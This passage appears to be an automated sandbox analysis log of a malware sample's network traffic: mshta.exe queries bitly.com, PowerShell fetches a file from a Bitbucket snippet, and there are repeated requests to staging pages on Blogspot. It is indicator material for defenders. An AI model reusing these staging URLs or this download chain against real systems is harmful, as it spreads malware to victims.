                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:Hmt6ODuT1T9rHnbQAYn_Kn4-RIPtxg:emLdUalzCJuXb2hK
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:bo4Rzlac7OC6SQzizPuNFmoxcxmpHg:LWMGlJqI2wYq8ec8
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.org
                      Source: global trafficHTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:L3viVeTwYcxGvOqhkZuspYUloSz1Cg:OYEqVJkk_9TWQB1Z
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.org
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
                      Source: C:\Windows\SysWOW64\mshta.exeDNS query: name: bitly.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-Robots-Tag: noindex, nofollowContent-Type: text/html; charset=UTF-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 0